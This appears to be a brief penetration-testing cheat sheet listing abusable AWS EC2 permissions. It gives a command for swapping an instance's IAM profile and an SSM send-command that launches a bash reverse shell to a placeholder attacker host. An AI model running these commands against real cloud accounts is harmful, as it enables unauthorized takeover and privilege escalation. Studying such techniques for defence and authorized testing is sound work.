EC2
Abusable AWS EC2 permissions that can lead to compromise or privilege escalation
ec2:replace-iam-instance-profile-association
aws ec2 replace-iam-instance-profile-association \
--iam-instance-profile Name=<ec2-instance-profile-name> \
--association-id <iam-instance-profile-association-id>ssm:SendCommand
aws ssm send-command \
--instance-ids "<instance-id>" \
--document-name "AWS-RunShellScript" \
--parameters 'commands=["bash -c '\''bash -i >& <attacker-ip-or-domain>/<attacker-port> 0>&1'\''"]' \
--region <aws-region-of-ec2>IMDS
Last updated